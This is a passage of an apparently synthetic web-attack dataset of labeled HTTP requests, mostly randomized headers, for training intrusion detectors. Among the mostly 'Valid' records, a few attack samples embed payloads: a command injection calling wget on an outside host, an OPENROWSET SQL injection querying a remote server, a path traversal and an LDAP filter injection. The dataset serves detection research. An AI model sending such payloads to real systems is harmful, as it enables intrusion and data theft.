Content-Location: http://www.nt1W1tgs.org/tghe/asaecyTs/pnnA/setkwr/mfileoO.tar
Content-MD5: cG9lYWU1aXplZGlsdEVpbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Jan 07 24:04:39 CET
Last-Modified: Thu, 18 Nov 04 16:47:57 GMT
Host: www.aoeRu.be
Connection: close
Accept: */*;q=0.6
Accept-Charset: big5
Accept-Encoding: gzip, compress;q=0.5
Accept-Language: aethore-9o;q=0.1, t-e;q=0.5, ea8ojaao-s5wLmbw, esa3-o6atvsr, o1ovsolj-Wh
Cache-Control: no-cache
Client-ip: 182.146.49.239
Cookie: 0yp=a;itcctawelhra=06;tuthtmrG=F~tv@/e;es1i=/savbscripts
Cookie2: $Version="0"
Date: Sat, 29 Jul 06 13:50:21 UTC
ETag: "U0DNn@kPPXuJZ8.p"
Expect: lsstoeA
From: 4a64appe@alsxipenr.biz
If-Modified-Since: Fri, 17 Dec 04 10:22:14 UTC
If-Unmodified-Since: Tue, 21 Nov 06 01:45:05 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 12 May 04 23:07:22 GMT
Max-Forwards: 748
MIME-Version: 3.9
Pragma: a=vIn
Proxy-Authorization: NTLM UnJpbmVoenVuZXdjc2VpYVIzc2FvNXhyMWFhYW1uZnpuZXNtZW1lbWU=
Authorization: Digest username="Othxha"
Range: 25-158969,392635-882565,41-
Referer: http://www.LeSaa.uk/ofooL/lerSwn/inndiE.zip
TE: trailers
Trailer: TE
User-Agent: tdsbhiweojefi
UA-CPU: 68000
UA-Disp: 287,078,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2143x378
Via: 1.5 185.200.172.3, 0.0 28.254.151.19, 1.4 www.sr0er.html:94
Transfer-Encoding: rotuel; ieuoeo=zsydlcwa
Upgrade: httiri/1.3, 75a/6.7, ueeo/8.2
Warning: 039 18.32.213.153 "1himeenD6aarst" "Wed, 25 Aug 04 07:02:03 UTC"
X-Forwarded-For: 149.226.91.226
X-Serial-Number: 1368641
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rsetetoorgd9ea=dcr3rmcdtnrsktidwt&1inelXbrctyrTo1=rhiyd&k5eruag6htpI=4e&InunwdtfrjO=90&at=agmedSxfQZj&syt3icipemirse=it@&neNeoi0iDesidn=og6osne6pa&hozssd3gem=zlaT0o&apd3ri=a5maie&jncLazciW.=telnetnxelinkEoe13E3d3&ua=58597951&ylhsawieteen=4618&aw1U=%eie&ODYNYq69JV=is llecho3ds>y:

End - Id: 33082
Start - Id: 43573
class: OsCommanding
GET /afrELST873M/phwkmLPD1v/e6Fou6CqXuDM41MI8Bm/ytda1afisri.aspx?izroojaIe=99ndMao1io3mns&eseOlkozn=+&0rkc=2&entloseow=rpNepnlyuh&ei3eftnhi=3gmieeyWe&PPXX_3W=e&ha=%22++++%3B+++%2Fusr%2Fbin%2Fwget++++www.ngna.com%2Fri+++%3B&ulutesdyw=375481989&hptK8=95614827&t6ND2@b=%24b HTTP/1.1
Host: 170.144.169.191
Connection: keep-alive
Accept: text/xml, video/quicktime
Accept-Charset: euc-kr;q=0.8, gb2312;q=0.8
Accept-Encoding: *
Accept-Language: orI-src;q=0.0, I9C-ylaesct;q=0.8, 0i-hsfs, us5r-age9loa;q=0.6, Li-et
Cache-Control: only-if-cached
Client-ip: 204.155.155.122
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="361"
Date: Mon, 05 Apr 10 21:07:55 CET
ETag: "z@VDwv-LBAonIc6"
Expect: nhNcolo
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 10 Jun 06 21:14:32 CET
If-Unmodified-Since: Fri, 12 Sep 08 10:25:18 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Jun 09 08:07:19 CET
Max-Forwards: 040
MIME-Version: 5.9
Pragma: no-cache
Authorization: Digest realm
Range: 08647-744
Referer: http://www.88nep5ho.gov/hbmnr/rtxmF/tecaSlhf.htm
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 4.7; hI-es; rv:8.3.0) Gecko/48625136
UA-CPU: PowerPC
UA-Pixels: 569x2891
Via: 1.7 www.jmiteo7h.css, 2.4 116.251.164.25, HTTP/5.7 www.otsPhir.htm:059
Transfer-Encoding: compress

null

End - Id: 43573
Start - Id: 19336
class: Valid
GET /1Ld3jlNDlR/uhynE3k/cIe7/4UM/sPnNRxEif/g5Jbmg/enlturs/iKKmmcAEkUvI/ernhstfs1mhhh.gif?53n=ousyEty&gh2j33E6nres3ac=ioraelitmpa&Kj5QoQ=vbscripttKoa&arysozgTtXsse=ieAnhenaw&wmlrV=Tadtrstl&yK1=lsooAns1nefse8&dyStw9dtse=e_Ep1&peio=sthts HTTP/1.0
Host: www.psboo.ch
Connection: nlt3fq
Accept: application/*, application/postscript;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: ntixlnIb-19it;q=0.4, tT-ks5enrs, i-eznntet;q=0.6, i5vnshS-6;q=0.4, tbout-at2no;q=0.2
Cache-Control: no-cache
Client-ip: 33.79.28.5
Cookie: s2cygseayehine=stsx9a9;Rieo=3o$f<crottke:b;hwacjh=03;hc=ePpA;or=3980390
Cookie2: $Version="791"
Date: Wed, 07 Mar 07 13:45:23 CET
ETag: "yM.b@PPpJOVPMPCQ"
Expect: totcoe=xvtohed
From: Zda4pbA@utsheoe.biz
If-Modified-Since: Sun, 24 Jul 05 01:58:38 GMT
If-Unmodified-Since: Fri, 07 Nov 08 24:40:58 GMT
If-Match: "JJr@mBC-1_FM@Fy_"
If-None-Match: *
If-Range: Tue, 16 May 06 20:45:17 GMT
Max-Forwards: 99
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM Um01Y2VydWFIbm5oaDFsRXlsYXQwaWlzYWhtMUhzMzl1YXd0c0Fld2J1bWk=
Authorization: NTLM c2FjT2xjRm5IZ2FudHJmaW5ubm5hZWVJczhzdDA4bW1hc2RpcmV1c3Rmdg==
Range: 0-6218,62-,-50681
Referer: /1ylyqdtf.sh
TE: trailers
Trailer: From
User-Agent: eo5e/5.5.3
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x2255
Via: 4.0 114.22.184.23
Transfer-Encoding: ltl1ir; aTauniu=Gelou0on
Upgrade: mt1/2.2, et8/1.8, iIcNti/6.4, teilcd/0.2
Warning: 393 82.153.131.121 "5rke" "Mon, 28 Jan 08 09:40:53 GMT"
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19336
Start - Id: 9964
class: Valid
GET /se7ssLCnDthnL45e3de/6bicPZKouM/i1nLwtr/axensrye.tiff?aZrnter=OdasloTS7apz&moc1lIceiat7oh=hpasswdm-style&hnoentlexnr8=o0WcjBQ&eCsrosd=eAykgtrel&lJR9G2M=lae&tuhtjgade=5b&xssor=lirelwuhlTSnel&ralaieewarzea7a=rlfpasswd%5DtmpOlm0hzai&aSuo=73677510&enoo=7770725&dau=rolikessl%7C&tNkmconnectNRti=rei8rH&njosocAonR=Org%24r3game HTTP/1.0
Host: www.icnNsHiasv.it
Connection: ntpTnrf
Accept: text/*, text/xml
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, compress;q=0.3, compress;q=0.7, identity;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 153.157.43.209
Cookie: lsi9cau=rkiG8Q_o
Cookie2: $Version="573"
Date: Sun, 30 Mar 08 22:51:36 UTC
ETag: W/".4Z787.Yf8F0nvU"
Expect: iiapa
From: gaacps@toci.org
If-Modified-Since: Wed, 16 Jan 08 22:19:28 GMT
If-Unmodified-Since: Wed, 13 May 09 02:56:24 GMT
If-Match: *
If-None-Match: "UGEczkyAdJN7f8OyTpgE"
If-Range: Mon, 06 Oct 08 04:46:32 UTC
Max-Forwards: 97
MIME-Version: 9.2
Pragma: tnrlghfi=e
Proxy-Authorization: Digest nonce
Authorization: NTLM c3p0ZWNUbnJlY25zamJzZmV0ZXJpZ2hub2VlYWxmaWlsZWF2ZnkyVjFpQVIxMA==
Range: -96
Referer: http://nstzo.org/5esn.doc
TE: chunked;q=0.0
Trailer: If-None-Match
User-Agent: 4ldnryheomR4e
UA-CPU: 68000
UA-Disp: 042,750,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 596x007
Via: 7.7 www.z44aeuv.shtml, lRhg/8.8 www.0prsu.gif
Transfer-Encoding: compress
Upgrade: b2bhql/3.8
Warning: 614 www.ybpt.js "ithwrochasw4rgehd" 
X-Forwarded-For: 36.77.211.44
X-Serial-Number: 939778978647707
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9964
Start - Id: 1904
class: Valid
GET /auasetdlR4uwejtiuSAf/tZGjBmH.YS1HJnP/oJdmL_@/nMGf83laW9/rpj@sI_/eJ/ab6I/sned7ts/Ia0q8/eaesnumtfqdxe/5v.gif? HTTP/1.0
Host: 249.219.170.152
Connection: keep-alive
Accept: image/png, audio/basic;q=0.0
Accept-Charset: iso-8859-15;q=0.6, windows-1252, windows-1257;q=0.5
Accept-Encoding: gzip;q=0.5, deflate, deflate, identity, compress;q=0.6
Accept-Language: e-i67ae;q=0.1, roWrnrt-jrmnz;q=0.1, e5iaenf-38j1tedQ, q-a;q=0.9
Cache-Control: max-age=9003
Client-ip: 136.226.137.157
Cookie: eaac3sp=iM5Klisgnvjc;ih9hc=81715630;t8ttNo=46;5dlodvfAeefo=a5includeconnecteed3eaos;snb=fl8 ;aw7siMzdropMk=soNu
Cookie2: $Version="83"
Date: Sun, 25 Apr 04 16:24:19 UTC
ETag: "5akjY@04y3w7qYSzEYDR"
Expect: neSrn4=ecsarcdw
From: chcroee@utelcE93Ia.biz
If-Modified-Since: Mon, 19 Apr 10 24:15:34 GMT
If-Unmodified-Since: Mon, 19 Dec 05 17:26:43 UTC
If-Match: "X6yHlxohf-3d5D.x"
If-None-Match: "e4bSxGLqOFmHAq7sxYD"
If-Range: Mon, 27 Sep 04 23:27:41 UTC
Max-Forwards: 3104
MIME-Version: 2.8
Pragma: c='eosqiree'
Proxy-Authorization: wrea ltni=8Rsiyra
Authorization: NTLM c2VlcGRhODlpb254bGlnUW9rQnQwVGlhSG9UZWRlb25zb2k3OHJuZWkxclNi
Range: 3513-,5034-3
Referer: /rTtet/auoti5s/lAtRvO/t5l5/Se4gieew.png
TE: trailers,gzip;q=0.2
Trailer: Expect
User-Agent: Mozilla/5.7 (X11; U; Open BSD i586 5.1; ca-eI; rv:0.4.8) Gecko/03003232
UA-CPU: PowerPC
UA-Disp: 272,378,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 594x6031
Via: FTP/0.0 www.sein7ent.html, FTP/6.3 36.241.31.148
Transfer-Encoding: silm; uksaeifr=bdlgotS
Upgrade: olz/0.5
Warning: 924 www.bbtn.js "trtrnasnAn" 
X-Forwarded-For: 96.142.115.10
X-Serial-Number: 1247280154947
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1904
Start - Id: 42450
class: SqlInjection
GET /6inou1ngat.cgi?ttotmirtiliep=%3B++insert+into++++OPENROWSET%28%27SQLoledb%27%2C%27uid%3Daveyre%3Bpwd%3Diyffumyrd%3BNetwork%3DDBMSSOCN%3BAddress%3D63.56.212.54%2C1433%3B%27%2C%27select++++*+++from+++++_sysdatabases%27+%29%3B+++++select+++*++++from+++LinkedOrRemoteSrv1.master.dbo.sysdatabases&mjlegeh4u=2376 HTTP/1.1
Host: 201.7.192.122
Connection: close
Accept: audio/x-wav
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 220.25.102.83
Cookie: cdopennin=Fkobjectk;Duftb6=173
Cookie2: $Version="574"
Date: Sun, 13 Jan 08 15:35:31 CET
ETag: W/"Ng0H_XYkXY0iPSN"
Expect: 100-continue
From: erEcOsi@8seaoan.st
If-Modified-Since: Fri, 07 Nov 08 11:29:52 GMT
If-Unmodified-Since: Sat, 15 Nov 08 12:13:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.7
Pragma: ebeE=lb9hcCeo
Proxy-Authorization: Digest realm
Authorization: sslt Eskt=oit2itS
Range: 6369-,501-7998
Referer: /eosti/Ercu/tlSii.pl
TE: trailers,chunked,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: tlgHn3C_V http://www.nsec.biz
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0316x1204
Via: HTTP/6.2 www.NygL.css, FTP/8.2 www.yopco.jpeg
Transfer-Encoding: gzip
Upgrade: Akupc/1.8, aT6m/0.6
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 631261097
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42450
Start - Id: 29100
class: Valid
GET /fP-1A2OpMZOxvkthwBwm/lXj/mnlges/Weaesesneaednn/erOuyiziaperanram/o4nmt/sY.htm?mtoujenetth=873&-@O4SF2@pexecs7=6431&0mcoviqaais=0777398&nhoiu=jdteeeIb&GBog=789708932&crswOiegino=oqrI39cs1mgaatYr8e&udeh4kATvwr=ddotsmtja41rht3oAo&sn7reiwn=oaZthTylspacch&lt=enrMd HTTP/1.0
Host: 252.63.97.120
Connection: close
Accept: image/*;q=0.3, text/xml, application/*;q=0.2
Accept-Charset: iso-2022-kr, windows-1258, koi8;q=0.5, koi8
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 189.95.44.101
Cookie: pnsinee=hD-QIK
Cookie2: $Version="661"
Date: Sat, 30 Jul 05 13:40:27 UTC
ETag: "PkYPdNa8vUSgxY2igX"
Expect: 100-continue
From: nbrdn3@nn5EreeeAS.fr
If-Modified-Since: Mon, 21 Feb 05 17:52:12 UTC
If-Unmodified-Since: Fri, 14 Jul 06 23:05:57 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Sep 09 20:56:51 GMT
Max-Forwards: 74
MIME-Version: 8.9
Pragma: id4a='n7'
Proxy-Authorization: aiEVod ino2qn=1ud6sw
Authorization: Basic bk4wZW04ZjY6YXNlZW96bg==
Range: -5612
Referer: /szeset.doc
TE: trailers,trailers
Trailer: If-Range
User-Agent: uRa1tea/7.6
UA-CPU: PowerPC
UA-Disp: 352,591,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7767x3879
Via: 9.3 178.254.42.241, 6.4 www.i2im.gif
Transfer-Encoding: deflate
Upgrade: rotr/8.6, 0vwd/6.0, 7ye/1.1, etnead/3.9, 7aate3/3.4
Warning: 578 127.67.231.111 "ugscstrototEa" 
X-Forwarded-For: 6.85.252.74
X-Serial-Number: 1881707
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29100
Start - Id: 24882
class: Valid
GET /Olespie42atdegvae0/2JF65EGhw8iframedJ0K/be.9/6clYemr/haHffrdhshetn/9.g0/e8bPUL_n./pSo@PJUhKexRYk.03M-A/asIi/rZZYIE6fcA.dll?.linkBI6JTxgWW=%5DEy HTTP/1.1
Host: 154.177.210.197:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-9, iso-8859-5;q=0.7, euc-kr;q=0.9, utf-7
Accept-Encoding: *
Accept-Language: aeiadnh-abocddlo;q=0.2, fes0q-s
Cache-Control: only-if-cached
Client-ip: 53.224.112.84
Cookie: irut=oochtlaNoiAnr8l4;rcpVWfW_a=(elEn8httpgns$ihavingmatiLri;dffco4AcRxnZe=?[i-oeanco;olSorcwt=ag+a
Cookie2: $Version="9"
Date: Sun, 02 Mar 08 03:05:51 GMT
ETag: W/"ahnaoqFV9xRdesl"
Expect: 100-continue
From: Xn3Re@fshsaAh.de
If-Modified-Since: Mon, 30 Oct 06 24:38:20 UTC
If-Unmodified-Since: Thu, 01 Jan 09 18:29:53 UTC
If-Match: *
If-None-Match: "0d_i-3atYhQio38_Vwn"
If-Range: Tue, 20 Jan 04 14:31:59 CET
Max-Forwards: 2
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Vigo a1lc=hriaibi
Authorization: tiin ehcr8e=diae5T
Range: 2531-5,49-34
Referer: http://www.e37lbobr.ch/rses7e/hIlM/6isoxd/sejtviu.asp
TE: gzip;q=0.1,trailers
Trailer: Accept-Language
User-Agent: n8GshO http://www.eiiznR.org
UA-CPU: StrongARM
UA-Disp: 5769,5085,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x570
Via: 3.5 114.26.88.123, 7.4 128.234.159.126, 0.0 61.154.97.73
Transfer-Encoding: compress
Upgrade: ased8c/7.2, xfope/7.9, hidk/5.6, ote/8.0
Warning: 414 www.Eaoi.htm "troze3ol71" "Tue, 13 May 08 15:22:03 CET"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24882
Start - Id: 825
class: Valid
GET /QwwpassthruxWbIusrr6k.gif?nulljaJEDa=p9+&aaScehLn=uwenoo&l5c4eujtida=43192&HlikeUNxmlzfzPF=a9c&neuhJwola=y5rsrudy&giuniodaNtt=31&zO2iframe=19050&iC=%2Fm&aomsn=no3xqTe47shutdownnn%7Et&nldlssUeth0Hnia=5113&gci=+aeeG%24%5Breplace HTTP/1.1
Host: www.7Rxz1baE.com
Connection: TaAte
Accept: text/plain;q=0.9, video/quicktime
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: n1hetmea-ekspdi6;q=0.0, e-hb;q=0.4
Cache-Control: max-stale=7
Client-ip: 97.242.61.48
Cookie: zhaqdteFeenh24= exiweab;dvhmcndeftc=24326571;e0ZOrcyjcIhen=v5Qt4siturbt;liroebGvre=6839194
Cookie2: $Version="5"
Date: Thu, 13 Jul 06 10:37:31 CET
ETag: "P@SVbqfWk7mvrnToa.f"
Expect: 100-continue
From: otea@mcanstwra.de
If-Modified-Since: Fri, 02 Feb 07 01:22:48 CET
If-Unmodified-Since: Sat, 19 May 07 18:58:04 UTC
If-Match: "_hUJBvIDdWBVzxBZde-"
If-None-Match: "mUJGa@7bVUUP6PC4eU"
If-Range: Mon, 13 Oct 08 14:24:56 CET
Max-Forwards: 7
MIME-Version: 3.5
Pragma: oear1izn='in'
Proxy-Authorization: NTLM czY0bW9zY3NlZ29wbXB0enRkZVJnYnNYbUtpMGlzbnZu
Authorization: NTLM TmhjN21sTmVuY3Q4cG0waGVzdG9udGVEU1J0aGhudGZzdG9lZmVpdW5lc3plRXNv
Range: -5014,811909-578591
Referer: http://www.m1ka9Hn.ch/rtrr1mdb/ts58.php
TE: trailers
Trailer: If-Match
User-Agent: k4o1u3I
UA-CPU: Sparc
UA-Disp: 801,214,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 079x771
Via: 6.4 www.rclet.jpg, HTTP/2.9 www.tninhbpp.jpg
Transfer-Encoding: identity
Upgrade: almoet/4.8, agnifh/3.7, kiSch/4.1
Warning: 424 www.o4ylbeo1.html "eOaoepcehwUc" 
X-Forwarded-For: 183.29.19.247
X-Serial-Number: 510626783025324042
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 825
Start - Id: 28891
class: Valid
GET /gbhoTognEkd/D8XrpincludeLaWpX7DM/efKsG2M/eg/emJSfebpEgsfoa/5ttescdqseo/uWtR8h2@man/A8vnGqT0Q-0N/ly8nhRD/6e/emHgDIaVHSlP@8MLLNw/bi6FZ.htm?jn=oagtb48WeIdr&tEoEe=2a++e%3Ci%7Edivdvaraphp+%5Cdiv%3B2opttelnet&1oslhbeiA=13350473&Pnull6TK7JBF1n=Sdgdti&upnwlnorjn7=got&thfneA=6XcLdF&null464Xj=cWBH&nSueeEo=mas9&eihf5headiPs=vicerhlifVaaIjpoCl&deleteE_nodec5nm=tiaithInh7hVehttp HTTP/1.0
Host: 21.167.30.192:80
Connection: close
Accept: image/gif
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oees-stnnnDh, hoyG-2dw;q=0.3
Cache-Control: max-stale=031
Client-ip: 43.22.120.250
Cookie: wnme= rcsea8 d(iElink&;ho=sttL1es7rDhh;bxo3ux1aeydo=89513397;kgOGzeAz.r=P1e0t;oRrr=s3of5mL3hhnnaa;ptismeits76t=b 
Cookie2: $Version="9"
Date: Wed, 21 Jan 09 18:23:36 UTC
ETag: "2DjujeEkOAeoLe7@"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Thu, 21 Jul 05 04:17:03 GMT
If-Unmodified-Since: Mon, 19 Apr 04 08:28:36 CET
If-Match: "dfJrc@3n9hGrb6OYqw"
If-None-Match: "dgWJ8McAp0y4mx0"
If-Range: Thu, 19 Aug 04 15:46:51 UTC
Max-Forwards: 00
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: STsh gaeltfy=aI5t
Range: 341022-02,-20
Referer: /lzieec/6tfre.tiff
TE: deflate,chunked,chunked;q=0.7
Trailer: If-None-Match
User-Agent: Mozilla/4.0 (X11; U; Unix 9.3; 9r-Ri; rv:2.5.9) Gecko/84196302
UA-CPU: MIPS
UA-Disp: 647,902,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 122x5513
Via: 2.6 9.97.32.7, rcys/2.2 146.91.150.243, HTTP/5.7 74.209.74.51:0
Transfer-Encoding: gzip
Upgrade: sippk/3.0, sieesd/6.3, eUhlW/5.4, r57ml/6.9, oriie/9.1
Warning: 104 www.oaChe2ao.css "si2kaalcoktaehr" "Sun, 05 Aug 07 09:32:59 GMT"
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 926912300576004465
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28891
Start - Id: 44977
class: PathTransversal
GET /iesehnd4el5dyxmdio/lCKbmpSIGOAKUy/v_wUbr_XF/MwUlw/ftpvjdiv23T762F/tLJNAiPy5wPyUd./LTMYN4XS2/kVh6/BnikkhDmiileTee/aeAihwPaA39ibdaw4eg/ozMs.shtml?92P=8153977&ovriad=HeidDsmochadfe6ijb1&R3like6yX@.=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml HTTP/1.1
Host: www.kxMtewg.be
Connection: haaDjL
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: 9o-e2owete, e-eedctel, znos-ptNeoae, ilmepe5e-al, xolNheha-aigni
Cache-Control: no-cache
Client-ip: 64.160.89.221
Cookie: faaxnoe=071977;Rrs=110580;sel=11714
Cookie2: $Version="2"
Date: Sun, 27 Dec 09 08:13:23 CET
ETag: "cQYNQi481EW5_Y7"
Expect: wpte
From: tsdma@neiban.be
If-Modified-Since: Sat, 27 Dec 08 21:00:23 UTC
If-Unmodified-Since: Mon, 25 Oct 04 06:00:42 UTC
If-Match: "1PKjliFUbeDC_p5py5c"
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 82
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM aW1ucm95dEUwb2VzdGZzY2RjaDhsbEJuZXRoaHlpdG1rZVZkeA==
Authorization: Digest uri=http://fhsnecM.biz/mt7r27b/cseb/teert4/aesed/wdRhTn.jsp
Range: -972278
Referer: http://oeohonne.de/eaouos/staos.nsf
TE: trailers
Trailer: If-Range
User-Agent: ejehso/5.1.8.3.6
UA-CPU: Sparc
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: FTP/2.0 www.nceaelo.js, 0.8 200.97.68.253, lhfhes/3.3 252.77.246.216
Transfer-Encoding: gzip
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 88070194263
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44977
Start - Id: 21656
class: Valid
GET /RQAHjZlibsxwFRoaR.swf? HTTP/1.1
Host: www.fpttqgelnn.biz
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8;q=0.9, utf-8;q=0.6, euc-kr, windows-1255;q=0.2, koi8-r;q=0.8
Accept-Encoding: *
Accept-Language: aix-loiuttn, n-nePaUtl;q=0.1, l-toEtbrsa;q=0.6, ekhhmemq-l0t;q=0.7, dpex-rtr
Cache-Control: no-cache
Client-ip: 23.129.128.29
Cookie: tctnsad=escdn]nc;vbOFtsBj96=l;e7e=btelb
Cookie2: $Version="614"
Date: Sun, 31 Dec 06 21:57:37 CET
ETag: W/"L_OyWdt7se14LII0sxw"
Expect: mimsam=los4;nnmse
From: ynfima@o2e6raaBs.org
If-Modified-Since: Thu, 08 Sep 05 19:01:25 CET
If-Unmodified-Since: Mon, 26 Dec 05 09:47:16 CET
If-Match: "_9V6Do8r40P65xNbVIX"
If-None-Match: *
If-Range: *
Max-Forwards: 9765
MIME-Version: 6.4
Pragma: nJoobSW='t'
Proxy-Authorization: Digest cnonce="mwtEreq"
Authorization: NTLM ZWVncnJUZGxhb1JZcnNlRWRpeG5vaTF0cmh0bGhhb290ZWQ1SXRvb0VpZU5laGQ=
Range: -349003,1849-0578
Referer: /xravcer.nsf
TE: trailers,chunked;q=0.6,gzip;q=0.0
Trailer: Expect
User-Agent: r15hPkp http://www.nysq.cz
UA-CPU: PowerPC
UA-Disp: 4503,714,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 838x039
Via: FTP/8.8 www.Tle0Tciu.shtml
Transfer-Encoding: deflate
Upgrade: anil/6.9, slee/1.5
Warning: 753 www.r8e8sd.jpeg "PRrTs4cebef6fdeoabnr" "Sun, 27 Mar 05 04:06:35 CET"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 5531184151712734020
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21656
Start - Id: 37870
class: LdapInjection
GET /tHn/aKl2V15BzKqPfW/2jSVNtrZ/tUTg7md/3mCcBEBRV1ia/yrhrtl5e/ienr8.shtml?mkFtktwt=lt0y4rB&U.all8e9=668422&p5iooecLhe=%26t&HnttagNsd8qE=48489545&epstyiat=+a&e5mt5dlaeofhde=25169822&Puc=03&Iwnntcmnhbbo=%29++%28++%7C%2807eyc%3Dni*%29&uewzsoc=sche%3Bo%27d9croe%3Ar&7QfandpQKkc0cnc=magi&ioou=03717852&rh1hHRens=56&Abhm=sscript HTTP/1.0
Host: 189.115.213.110:21065
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.2, x-mac-icelandic;q=0.7, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: rth-ytneoi, chasmmnb-eetn1, laas37-eotrn8;q=0.2, av-o9calen, z-iehtqhan
Cache-Control: no-store
Client-ip: 59.248.105.236
Cookie: vc6nh1dI4re0ccf=cotsi6Hsildu;irh=metame
Cookie2: $Version="7"
Date: Sun, 26 Dec 04 14:12:07 UTC
ETag: W/"2FKzg9Sm9Ylt2ij82H"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sat, 26 May 07 01:43:39 CET
If-Unmodified-Since: Sat, 26 May 07 09:23:23 GMT
If-Match: "ZCcjF3mjaH5DPP0fpZa"
If-None-Match: "PjZu4EEVzC9IP0.V1"
If-Range: *
Max-Forwards: 8503
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: vcyoe XEolGpxu=defga
Range: 89-,46-035533,8-609
Referer: http://www.lriefee.it/tueomS/jrpd2T/laee4d/suniAl/TLliey.png
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.3 (Windows; U; Win 9x 4.5; lt-ee; rv:7.7.0) Gecko/63247066
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: iNhtts/2.7 www.Trst.css:6819, 6.8 9.233.253.163
Transfer-Encoding: compress
Upgrade: obsm/5.8, 9ryw/0.8, Scti3/4.8
Warning: 785 154.219.196.57 "riredam4aosbhnieNsek" "Wed, 10 Jun 09 10:24:56 CET"
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37870
Start - Id: 34411
class: Valid
PUT /m-8-G5hfnt0wy1UQ1EG/aNdLsO2zs31e2USoqVg/_0includeED.oxdyt/hJwT/net.js? HTTP/1.1
Content-Length: 288
Content-Language: o
Content-Encoding: compress
Content-Location: http://tneb.net/oShaet/H3a8eos/EjialaEi/gdou.tar
Content-MD5: aHNPenVkcHRhZXJhdE5sYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Jun 08 02:42:45 GMT
Last-Modified: Sat, 31 Dec 05 20:09:57 UTC
Host: 34.35.255.54:43
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 98.127.115.183
